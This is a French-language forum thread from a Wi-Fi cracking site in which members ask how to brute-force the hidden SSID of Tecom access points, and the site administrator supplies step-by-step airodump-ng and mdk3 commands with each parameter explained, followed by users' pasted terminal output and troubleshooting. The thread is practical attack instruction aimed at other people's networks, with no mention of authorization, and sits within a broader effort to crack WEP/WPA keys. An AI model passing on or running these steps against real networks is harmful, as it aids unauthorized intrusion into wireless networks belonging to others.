Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-11-2008 00:12:55

tekilaz
Nouveau membre
Inscription : 11-11-2008
Messages : 7

bruteforce essid, bah oui mais comment?

Bonjour
voila j ai fait un petit dico maison et j essaie de bruteforcer un essid <lenght:19>
du tecom en clair...
ceci dit comment faire !

j utilise mdk3v3 et v4 et j ai le meme probleme
je fais
mdk3 wlan0 p -f dico -t @:m:a:c

ca refuse de se lancer : ca probe tous les réseaux alors que j ai donné la mac
enfin bref ca marche pas
j ai essayé avec charon ca bug aussi...

ha oui bien sur il n y a jamais de clients d ou le bruteforce
sinon oui je sais airodump, kismet, ethereal...

mickey : dans ton pack tecom, tu utilises un .sh qui le fait, qu elle est la commande associée derriere? merki

Dernière modification par tekilaz (22-11-2008 00:13:43)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-11-2008 12:39:26

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : bruteforce essid, bah oui mais comment?

Bon alors pour ce qui est des Tecom, normalement c'est du gateau big_smile

Tu as le pack Tecom Fast Cracker qui contient tout pour un crack automatique, mais si tu souhaites lancer l'attaque sans le script, et réaliser toi meme tes dicos (par exemple avec Giga Password Generat0r), c'est tout à ton honneur.

Pour les Tecom, voici la technique que j'utilise:

Je commence par lancer airodump-ng en filtrant le canal et l'adresse mac de la cible:

airodump-ng --encrypt wep -c $chan --bssid $macap $iface

$chan = le canal
$macap = le bssid (adresse mac du point d'accès)
$iface = l'interface wifi

Tu peux également bloquer la carte sur le canal de ton choix si tu veux, le but est de filtrer au maximum.

Ensuite, je lance le bruteforce avec mdk3:

mdk3 $iface p -f $dico -c $chan -t $macap -s $speed

$iface = l'interface wifi
$dico = le fichier dico
$chan = le canal
$macap = le bssid (adresse mac du point d'accès)
$speed = la vitesse d'envoi des paquets, à adapter en fonction de la qualité du signal

Voila, normalement avec ces conseils ça devrait rouler wink

PS: j'ai déplacé le topic dans la section Crack de clé WEP qui est plus appropriée.

Hors Ligne

#3 22-11-2008 14:43:46

tekilaz
Nouveau membre
Inscription : 11-11-2008
Messages : 7

Re : bruteforce essid, bah oui mais comment?

merci pour tes conseils
bon je comprend pas, ca passe pas... c est pourtant ce que je fais...
je lock ma carte sur le bon ssid via aerodump wlan0 --channel x --bssid x --encrypt wep
je fais mdk3 wlan0 -f dico -c 1 -t macap -s vitesse
et bah ca passe pas

j ai
SSID Wordlist Mode Activated !

Channel set to : 1

Waiting beacon frame from target ....
SSID is hdden. SSID Lenght is : 19
Sniffer threat started

Got reponse from ap_dont_men_fou, SSID "ssid_en_clair_dun_AP"
Got reponse from ap_dont_men_fou, SSID "ssid_en_clair_dun_AP"
Got reponse from ap_dont_men_fou, SSID "ssid_en_clair_dun_AP"
Trying SSID:
Packet sent : 1 - Speed : 1 packets/sec
Got reponse from ap_dont_men_fou, SSID "ssid_en_clair_dun_AP"
Got reponse from ap_dont_men_fou, SSID "ssid_en_clair_dun_AP"
Got reponse from ap_dont_men_fou, SSID "ssid_en_clair_dun_AP"
Killed
#

voila donc pour résumer ca se promene partout chez tous les AP
sauf celui qui m interesse...
je suis en alfa 500, c est quand meme pas elle qui bloque?


merci mickey c est sympa de m aider.
Pour ton script tout fait, ui je sais mais $$$, et j estime avoir le niveau de faire ca maison quand meme...
mais j aurais bien tester avec quand meme, tant pis

Hors Ligne

#4 22-11-2008 18:01:58

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : bruteforce essid, bah oui mais comment?

Normalement, dès que mdk3 a chopé le bon point d'accès, il lance les tentatives d'association avec les différents essids contenus dans le dico. Jettes un oeil à la vidéo Tecom Fast Cracker ça t'aidera peut etre. Normalement cette attaque fonctionne parfaitement avec l'alfa 500, pas de souci wink

Hors Ligne

#5 24-11-2008 10:27:58

tekilaz
Nouveau membre
Inscription : 11-11-2008
Messages : 7

Re : bruteforce essid, bah oui mais comment?

bon bah j ai beau faire tout pareil ca passe pas
bt mdk3-v5 # mdk3 wlan0 p -f ../tecomah42222.txt -c 6 -t 00:XX:38:50:FA:25 -s 10

SSID Wordlist Mode activated!


channel set to: 6
Waiting for beacon frame from target...

SSID is hidden. SSID Length is: 19.
Sniffer thread started
Trying SSID:
Packets sent:      1 - Speed:    1 packets/sec
Got response from 96:92:D8:BF:28:XX, SSID: "mXXX"

Got response from 00:1A:6B:AB:06:XX, SSID: "Livebox-XXXX"

Got response from E2:B5:85:EF:54:XX, SSID: "freebox"

Got response from E2:B5:85:EF:54:XX, SSID: "freephonie"

Got response from 82:4F:7A:BC:41:XX, SSID: "freephonie"
                                                                                             

et que dalle
j ai beau locké ma carte sur le bon channel, j ai testé mdk3 pareil
NEED HELP ca me soule !
mdk3 lui écrit : interface p:
et basta

j ai meme essayé avec MDK3v5 !
(ps : Mickey, je sais pas si t as vu ya des trucs pour le TKIP dans mdk3v5, ca vaudrait le coup de se pencher dessus peut etre qu il faut le combiner a tkip-tun)

Dernière modification par tekilaz (24-11-2008 10:28:51)

Hors Ligne

#6 24-05-2009 12:38:28

scarfays
Membre V.I.P.
Inscription : 17-03-2009
Messages : 236

Re : bruteforce essid, bah oui mais comment?

hello!
moi aussi apres plusieurs test, sur MKD3-v5 pour du bruteforce de ESSID, moi ca marche pas!
je fait mdk3 wlan0 p -f (dico.txt) -t (mac ap ciblé)
apres il ce lance mais pas longtemps ou pas a tout les coup!
de plus pour le brute force d'adresse MAC, il fait ca: 00:00:00:00:00:01 et pas aussi tot a 00:00:20:00:01
et des fois, il me dit que la mac est trouvé! 00:00:20:00:00 alors que c'est pas du tout ca!
sur un autre forum, il est dit qu'il bug complais sur le bruteforce de ESSID et de MAC.
la je test " charon " en francais, c'est cool ca pour les nul comme moi en anglais (en francais aussi... mais bon)
sur charon on dirai que ca marche mais le souci c'est que l'on voie pas la progresson du brute force
voila moi je teste le brute force sur une <lenght: 0>
alors merci pour votre aide

Hors Ligne

#7 24-05-2009 15:11:11

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : bruteforce essid, bah oui mais comment?

Oui, le bruteforce d'adresse mac avec mdk3 a l'air buggy, d'après tous les echos que j'ai eus (je ne l'ai pas testé). En revanche, j'ai testé l'attaque dico contre un essid caché, et ça fonctionne très bien. Je pense que ce type d'attaque ne marchera pas de la meme manière selon le point d'accès ciblé. Avec une bonne qualité de signal ça fonctionne très bien sur des Tecom.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 111 02-12-2016 21:32:19 par tit64
8 217 26-11-2016 00:02:49 par koala
5 145 22-11-2016 18:48:09 par koala
Bruteforce WPS par regard48
8 393 15-11-2016 16:19:36 par Fab955
4 249 20-10-2016 10:57:27 par Bonami2

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]